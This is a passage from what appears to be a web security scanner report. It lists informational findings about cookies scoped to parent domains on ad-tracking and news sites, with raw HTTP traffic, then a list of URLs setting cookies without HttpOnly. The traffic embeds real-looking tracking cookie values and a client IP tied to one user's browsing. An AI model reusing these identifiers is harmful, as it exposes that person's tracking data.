Cookie: adaptv_unique_user_cookie="3547400152957574101__TIME__2011-05-10+06%3A15%3A14"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1305874800,\"e\":1305874800,\"s\":[],\"a\":[]},\"8\":{\"f\":1307602800,\"e\":1307602800,\"s\":[1785],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="3547400152957574101__TIME__2011-05-12+04%3A39%3A28";Path=/;Domain=.adap.tv;Expires=Sun, 18-Jan-2043 13:26:08 GMT
p3p: CP="DEM"
Cache-Control: no-cache
Set-Cookie: audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1305874800,\"e\":1305874800,\"s\":[],\"a\":[]},\"9\":{\"f\":1307775600,\"e\":1307775600,\"s\":[528],\"a\":[]},\"8\":{\"f\":1307602800,\"e\":1307602800,\"s\":[1785],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Sun, 18-Jan-2043 13:26:08 GMT
Content-Type: image/gif
Server: Jetty(6.1.26)
Content-Length: 42

GIF89a.............!.......,...........D.;

13.83. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543457%22%20height=%221%22%20width=%221%22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segs.btrll.com
Path:	/v1/tpix/-/-/-/-/-/sid.6543457%22%20height=%221%22%20width=%221%22

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BR_MBBV=Ak2t54ZK4gSTAbNTSdI; expires=Thu, 10-May-2012 11:03:02 GMT; path=/; domain=.btrll.com
DRN1=AGPX0VFwToYAY9jFTmLU2QBj2O5OYtTZAGPYv05i1NkAY9wyTj6xcgBj3C9OGFRjAGPa4VGL6aQAY9hhTkJlZg; expires=Sat, 11-May-2013 11:03:02 GMT; path=/; domain=.btrll.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/tpix/-/-/-/-/-/sid.6543457%22%20height=%221%22%20width=%221%22 HTTP/1.1
Host: segs.btrll.com
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BR_MBBV=Ak2t54ZK4gSTAbNTSdI; DRN1=AGPX0VFwToYAY9jFTmLU2QBj2O5OYtTZAGPYv05i1NkAY9wyTj6xcgBj3C9OGFRjAGPa4VGL6aQ

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 11:03:02 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak2t54ZK4gSTAbNTSdI; expires=Thu, 10-May-2012 11:03:02 GMT; path=/; domain=.btrll.com
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: DRN1=AGPX0VFwToYAY9jFTmLU2QBj2O5OYtTZAGPYv05i1NkAY9wyTj6xcgBj3C9OGFRjAGPa4VGL6aQAY9hhTkJlZg; expires=Sat, 11-May-2013 11:03:02 GMT; path=/; domain=.btrll.com
Location: http://cache.btrll.com/default/Pix-1x1.gif
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

13.84. http://tags.bluekai.com/site/668 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/668

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bklc=4dcbc695; expires=Sat, 14-May-2011 11:37:57 GMT; path=/; domain=.bluekai.com
bk=JzUPJLV5c/sVIHOf; expires=Tue, 08-Nov-2011 11:37:58 GMT; path=/; domain=.bluekai.com
bkc=KJh5pM2nxkWRhdcFfxIoSYermUH+qcO111n8MGjeezv+k09ROnKi0uSCUvxkZhpalDALQISVUAeTYQvCXhiw28bpw/4wKUTdprkFy1XPwWl7Qx46MEXmqzX57tlaFMeMBxdMy4FS9XKuPyXp1OgO86FL0gN+0S+ES4QtIXKWqN3t/X4uP02lynIWfrlqtFrmJSdK06sM8asFhPTzRa70biCgfGGKTPcLXOgnAkzlpUMrxYaCtSFBDNHBdbWXYpqjUFA6RfFrVwg3lN6TddJGIfmQ0wcvez4uENgbbgEjEUgdkFI/ypFqJ8a+m5PdLuPlcQ==; expires=Tue, 08-Nov-2011 11:37:58 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/668 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bko=KJ0naVHQtYBXyoKH/DT/hgGOa8FWhLeyudrGnydecPTsCovSQf81ev3XWaktOkAIOGRq3ydTvMa/xkZYesa9FEqXITObqR9LDpenZh4YRZJ/CnvRsS39mATrtxsDBVj7RBQcjQW9KkLCUQ==; bkw5=; bkst=KJh5AeNgPWWDC3z/vmbrWP/vyuJkOrqppO0h0nojATMnL38JsqApZVAVBLP02yqgd/nQUf9HxhGCvR/uDDZbBwAB/Mjt+o8fqRJEFqpFzIjXnnepKTpKifrUQyUtZ4x5PAT76dN3rkj2JKrYgODVjjJS01HN/E1lLU9zFH1XQTjQLhxJGB4yUdfhmiAnJ7c7xI9ZJXreA19hCKuEaySWwFohEwpNfjjtXHBjFXkSR+GJ9aESmYr++39+fgqwva8LlSoT6kx1VAtaAKiP9KVDLKYA9gdVh/K+KLDc322/F0U2imaG5OO4eVt83qRv2lHi8C+MBDRGXlOMBkfFdP7IumyfRCI0UgzdfQ2tH3J4Pidfp2tL49tCm8dajdrEj3OmrI8K52DKCWuk7vzooedb2Rci8x8MqPRBDbibqXpt4sKIlqLidbjEEI/9qnesY37GMW/WpasYe0jQpOehIIAJLEXf2PVnS/rzwwv2AexlOuncY/JqpYRcQpRslc+zddlId7XlIQrc+7ru; bklc=4dcaa395; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101EbdIJxF9Wk5O+x=; bk=nlnE/1V5c/sVIHOf; bkc=KJh5pg6m9DWDOKYpxPCO/7oqIcA9JxAH2jRgYQgJgAKxvYun3vQAG+BRkUvMPbJHSp0OJ8O/pYUUfAyp12dzzpnMS19IYh0230Zmz1EivK8s9hIuQmXe+NlQtkyt85AJcUi/IEgA0PYt38Mbfczzv9b9N4E056Wh8578BB9oSqOSQj2kuvRXt6tJm6meUxNLM0sjXr0IVnRn/Oz0p57iv5Ha4NA8ZhcWFZT7jPrv3z2IjReKUzmGKeRBBnfrvvjItBH7btJttFh1d0cq12kBPpq+f92fxZzq; bkdc=res

Response

HTTP/1.0 200 OK
Date: Thu, 12 May 2011 11:37:58 GMT
Set-Cookie: bklc=4dcbc695; expires=Sat, 14-May-2011 11:37:57 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Fri, 13 May 2011 11:37:58 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=JzUPJLV5c/sVIHOf; expires=Tue, 08-Nov-2011 11:37:58 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh5pM2nxkWRhdcFfxIoSYermUH+qcO111n8MGjeezv+k09ROnKi0uSCUvxkZhpalDALQISVUAeTYQvCXhiw28bpw/4wKUTdprkFy1XPwWl7Qx46MEXmqzX57tlaFMeMBxdMy4FS9XKuPyXp1OgO86FL0gN+0S+ES4QtIXKWqN3t/X4uP02lynIWfrlqtFrmJSdK06sM8asFhPTzRa70biCgfGGKTPcLXOgnAkzlpUMrxYaCtSFBDNHBdbWXYpqjUFA6RfFrVwg3lN6TddJGIfmQ0wcvez4uENgbbgEjEUgdkFI/ypFqJ8a+m5PdLuPlcQ==; expires=Tue, 08-Nov-2011 11:37:58 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Fri, 13-May-2011 11:37:58 GMT; path=/; domain=.bluekai.com
BK-Server: c45a
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!.. ....,...........L..;

13.85. http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/topics/reference/timestopics/subjects/p/private_equity/index.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; expires=Friday, 11-May-2012 11:15:57 GMT; path=/; domain=.nytimes.com
adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:1|s*1780a=0:1|s*2554b=0:1; path=/; domain=.nytimes.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /topics/reference/timestopics/subjects/p/private_equity/index.html?inline=nyt-classifier HTTP/1.1
Host: topics.nytimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; _chartbeat2=0b2fi2bgk284tw0q; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:1|s*1780a=0:1; nyt-m=D5A6A596AEC66C101E6FF77DE512588B&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.11.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305198956177:ss=1305198204263; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638

Response

13.86. http://track.ft.com/track/track.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://track.ft.com
Path:	/track/track.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

FTUserTrack=173.193.214.243.1305198170970491; path=/; expires=Sun, 09-May-21 11:02:50 GMT; domain=.ft.com
AYSC=_04dc_13USA_14USA_15us_17mid%2Batlantic_18washington_24north%2Bamerica_25high_26202_27PVT_99S_; Domain=.ft.com; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /track/track.js HTTP/1.1
Host: track.ft.com
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC"
Set-Cookie: FTUserTrack=173.193.214.243.1305198170970491; path=/; expires=Sun, 09-May-21 11:02:50 GMT; domain=.ft.com
Set-Cookie: AYSC=_04dc_13USA_14USA_15us_17mid%2Batlantic_18washington_24north%2Bamerica_25high_26202_27PVT_99S_; Domain=.ft.com; Path=/
Cache-Control: no-cache
Content-Length: 0
Date: Thu, 12 May 2011 11:02:50 GMT
Connection: Keep-Alive
Location: http://media.ft.com/null.js
Server: Apache/2.2.17 (Unix) mod_jk/1.2.30 mod_ssl/2.2.17 OpenSSL/0.9.7d
Content-Type: application/x-javascript
Pragma: no-cache

13.87. http://va.px.invitemedia.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://va.px.invitemedia.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

segments_p1="eJzjYuFo2czIxcWxZx+zwKX2K+9YACvmBhc=";Version=1;Path=/;Domain=invitemedia.com;Expires=Fri, 11-May-2012 11:49:38 GMT;Max-Age=31536000

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?key=segment&pixelID=57148&partner_uid=&partnerID=115 HTTP/1.1
Host: va.px.invitemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: segments_p1="eJzjYuFo2czIxcWxZx+zwL/N596xAAAtYAZp"; uid=2ecd6c1e-5306-444b-942d-9108b17fd086; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjY4XSwgIjQiOiBbIkNBRVNFTHhJVnRkbXQzZEthZnMzRlQ4dDRRMCIsIDczNDI2N119; subID="{}"; impressions="{\"591269\": [1305111613+ \"2904264903406918006\"+ 184+ 789+ 926]+ \"591281\": [1305111351+ \"2727804715311744746\"+ 184+ 789+ 926]}"; camp_freq_p1=eJzjkuF49ZlFgEli742V71gUmDT2PwHSBkwW268BaQCvyAyE; io_freq_p1="eJzjkuY4HijAJLH3xsp3LAqMGj9BtAGTxfZrQBoAnC8L5w=="

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 11:49:38 GMT
Set-Cookie: segments_p1="eJzjYuFo2czIxcWxZx+zwKX2K+9YACvmBhc=";Version=1;Path=/;Domain=invitemedia.com;Expires=Fri, 11-May-2012 11:49:38 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Location: http://ad.yieldmanager.com/pixel?id=1268516&t=2
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)

13.88. http://www.csscorp.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.csscorp.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

csscorp=173.193.214.243.1305201371350323; path=/; max-age=315360000; domain=.csscorp.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.csscorp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

13.89. http://www.nytimes.com/adx/bin/adx_remote.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nytimes.com
Path:	/adx/bin/adx_remote.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

adxcl=t*26edd=4e32303f:1305112022; expires=Friday, 11-May-2012 11:03:02 GMT; path=/; domain=.nytimes.com
adxcs=si=0:1|s*192f7=0:1; path=/; domain=.nytimes.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/dealbook/post&posall=XXL,TopAd,Bar1,Position1,Position1B,Top5,SponLink,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Frame6A,Left2,Left3,Left4,Left5,Left6,Left7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE,SponLink2&query=qstring&keywords=Mergers+&+Acquisitions;Investment+Banking;I+PO;I.P.O.s;IPOs;Offerings;Private+Equity;Hedge+Funds;Venture+Capital;Legal;The+New+York+Times;Andrew+Ross+Sorkin;Andrew+Sorkin;+DealBook;deal+maker;Wall+street;wall+st.;Goldman+Sachs;Goldman+Sachs+Group;Morgan+Stanley;Morgan+Stanley+Smith+Barney;Citigroup;Citibank;Citi;Citicorp;Bank+of+America;Bank+of+America+Merrill+Lynch;Merrill+Lynch;Merrill;JPMorgan+Chase;J.P.+Morgan+Chase;J.+P.+Morgan+Chase;J.P.+Morgan+Securities;Bear+Stearns;Lehman+Brothers;Credit+Suisse;Credit+Suisse+First+Boston;CSFB;UBS;Deutsche+Bank;SAC+Capital;S.A.C.+Capital;Stevie+Cohen;Henry+Kravis;KKR;Kohlberg+Kravis+Roberts;Stephen+Schwarzman;Stephen+A.+Schwarzman;Steve+Schwarzman;Blackstone+Group;animal-kingdom;boston-celtics;carl-pascarella;churchill-downs;david-bonderman;detroit-pistons;kentucky-derby;new-york-mets-org;platinum-equity;private-equity;retailleisure;steven-a-cohen;team-valor-international;tom-gores;tpgtexas-pacific-group HTTP/1.1
Host: www.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; ebNewBandWidth_.www.nytimes.com=2534%3A1304378197383; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; adxcl=t*26edd=4e32303f:1305112022; nyt-m=E3DB375A9111923DC1D65DE89ACF26F3&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.9.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513; _chartbeat2=sb4nmgc9whf8empd

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:03:02 GMT
Content-type: text/html
Set-cookie: adxcl=t*26edd=4e32303f:1305112022; expires=Friday, 11-May-2012 11:03:02 GMT; path=/; domain=.nytimes.com
Set-cookie: adxcs=si=0:1|s*192f7=0:1; path=/; domain=.nytimes.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache
Pragma: no-cache
Content-Length: 22704

var adxads = new Array(11);

adxads[0] = "<img src=\"http://graphics8.nytimes.com/ads/blank.gif\">";
adxpos_Bottom7 = 0;

adxads[1] = "<script> function safeMultiTrack() { if ('dcsMultiTrack' in wind
...[SNIP]...

13.90. https://www.wellsfargo.com/jump/theprivatebank/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.wellsfargo.com
Path:	/jump/theprivatebank/index

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

v1st=860BCE3A6686392; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
wcmcookiewf=2YvRNL1DhnQJXpvqtrRMH62pV5nkJ3W9wswYr5TSXhRqMGc2yXqQ!-1621466656; domain=.wellsfargo.com; path=/; secure
wfacookie=B-20110512040747952746006; domain=.wellsfargo.com; expires=Sunday, 09-May-2021 11:07:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14. Cookie without HttpOnly flag set previous next
There are 157 instances of this issue:

https://ams-legal.net/support/default.asp
https://ams-legal.net/tuckerellis/Image.asp
https://ams-legal.net/tuckerellis/Login.asp
https://ams-legal.net/tuckerellis/default.asp
https://ams-legal.net/tuckerellis/default.asp
http://axley.com/
http://cgiwsc.enhancedsitebuilder.com/cgi-bin/counter.PicCount
http://cgiwsc.enhancedsitebuilder.com/extras/public/formular.cls/show
http://convctr.overture.com/images/cc/cc.gif
http://cpadominator.com/campaigns/index.php
http://foxbusiness.disqus.com/thread.js
http://generalatlantic.com/en/team/overview
http://m1463.ic-live.com/572/
https://personal.vanguard.com/us/funds/snapshot
http://privatemoneytalk.com/
http://revelations.trovus.co.uk/tracker/542.gif
https://secure.reportingsystem.com/TPG/index.cfm
https://services.sungarddx.com/common/js/AdminFunctions.asp
https://services.sungarddx.com/js/source.asp
http://trc.taboolasyndication.com/bloomberg/trc/2/json
https://webmail-us.mimecast.com/webMail/login.jsp
https://webmail.tuckerellis.com/exchweb/bin/auth/owaauth.dll
https://ww3.janus.com/advisor/about-janus
http://www.ams-legal.com/
http://www.apolloic.com/
http://www.conferenceservers.com/browser/proxy.asp
http://www.dmoc.com/
http://www.elawmarketing.com/
http://www.huroncapital.com/secure/
http://www.kkr.com/company/landmark_achievements.cfm
http://www.kkr.com/investor/investor_relations_overview.cfm
http://www.kkr.com/kpe/private_equity_overview.cfm
http://www.kkr.com/team/theteam.cfm
http://www.korteco.com/
http://www.milbank.com/en
http://www.pillsburylaw.com/
http://www.pillsburylaw.com/connect_forgotpassword.cfm
http://www.pillsburylaw.com/index.cfm
http://www.pillsburylaw.com/scripts/images/arrows-default.png
http://www.pomerantzlaw.com/cases.html
http://www.privateequityinfo.com/
http://www.privatemoneytalk.com/
http://www.provequity.com/
http://www.providenceequitypartners.com/
http://www.stroock.com/
https://www.usaa.com/inet/imco_mutualfund/ImMutualFunds
http://ad.amtk-media.com/iframe
http://ad.doubleclick.net/clk
http://ad.turn.com/server/ads.js
http://ad.yieldmanager.com/iframe3
http://ad.yieldmanager.com/imp
http://ad.yieldmanager.com/pixel
http://ad.yieldmanager.com/unpixel
http://ads.adbrite.com/adserver/vdi/742697
http://ads.cpxadroit.com/adserver/10-794ZA8LJ0UA05.cpxad
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads1.revenue.net/j
http://ads1.revenue.net/load/227245/index.html
http://akatracking.esearchvision.com/esi/redirect.html
http://akatracking.esearchvision.com/esi/redirect2.html
http://altfarm.mediaplex.com/ad/js/15917-119013-26745-9
http://amch.questionmarket.com/adsc/d908257/6/911744/decide.php
http://amch.questionmarket.com/adsc/d909615/2/200214693344/decide.php
http://amch.questionmarket.com/adsc/d909615/2/200214693345/decide.php
http://amch.questionmarket.com/adsc/d909615/2/200214693346/decide.php
http://amch.questionmarket.com/adsc/d909615/2/912024/decide.php
http://amch.questionmarket.com/adsc/d909615/2/912025/decide.php
http://amch.questionmarket.com/adsc/d909615/2/912026/decide.php
http://amch.questionmarket.com/adsc/d909615/2/912027/decide.php
http://b.scorecardresearch.com/b
http://bing.com/
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://cf.addthis.com/red/p.json
http://core.insightexpressai.com/adServer/adServerESI.aspx
http://cspix.media6degrees.com/orbserv/hbpix
http://da.newstogram.com/hg.php
http://domdex.com/f
http://ds.addthis.com/red/psi/sites/www.elawmarketing.com/p.json
http://ds.addthis.com/red/psi/sites/www.pomerantzlaw.com/p.json
http://engine.cmmeglobal.com/v1/page-view
http://idpix.media6degrees.com/orbserv/hbpix
http://js.revsci.net/gateway/gw.js
http://lfov.net/webrecorder/g/chimera.js
http://lfov.net/webrecorder/js/listen.js
http://lfov.net/webrecorder/w
http://marketing.csscorp.com/acton/bn/1090/visitor.gif
http://markets.on.nytimes.com/research/modules/dealbook_2010/dealbook.asp
http://meter-svc.nytimes.com/meter.js
http://metrics.foxnews.com/b/ss/foxnewsbusinessprod/1/H.20.3/s19025191229302
http://odb.outbrain.com/utils/get
http://odb.outbrain.com/utils/ping.html
http://overseebroad.d.chango.com/c/t.js
http://pepperhamilton.com/
http://pillsburylaw.app4.hubspot.com/salog.js.aspx
http://pix04.revsci.net/D08734/a1/0/0/0.gif
http://pix04.revsci.net/E05510/b3/0/3/1003161/38529734.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/203086575.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/215595401.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/225588936.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/273184684.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/293330189.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/396037982.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/513736918.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/551354059.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/562084143.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/579814010.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/590965522.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/702365539.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/71896167.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/747456476.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/848419951.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/912026619.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/949356899.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/955065746.js
http://pix04.revsci.net/J07717/b3/0/3/1003161/451564742.js
http://pix04.revsci.net/K05539/b3/0/3/1003161/248479722.js
http://pixel.33across.com/ps/
http://pixel.quantserve.com/pixel
http://privatemoneytalk.com/wp-content/plugins/wp-spamfree/js/wpsf-js.php
http://r.turn.com/r/bd
http://r.turn.com/r/beacon
http://r.turn.com/server/pixel.htm
http://segments.adap.tv/data/
http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543457%22%20height=%221%22%20width=%221%22
https://services.sungarddx.com/default.aspx
http://tags.bluekai.com/site/668
http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html
http://track.ft.com/track/track.js
http://translate.googleapis.com/translate_a/t
http://va.px.invitemedia.com/pixel
https://virtualoffice.tuckerellis.com/
http://wt.o.nytimes.com/dcs3baftr1000008q5oxvjceo_4r9g/dcs.gif
http://wt.o.nytimes.com/dcsc32upj10000c58n7kgpaeo_8i3g/dcs.gif
https://ww3.janus.com/favicon.ico
http://www.apolloglobal.us/
http://www.apolloglobal.us/index.php
http://www.beneschlaw.com/
http://www.beneschlaw.com/FCWSite/Include/spamproof.aspx
http://www.csscorp.com/
http://www.digiware.net/
http://www.gobignetwork.com/funding
http://www.mimecast.com/
http://www.mimecast.com/About-us/Contact-us/
http://www.mimecast.com/What-we-offer/
http://www.moritthock.com/
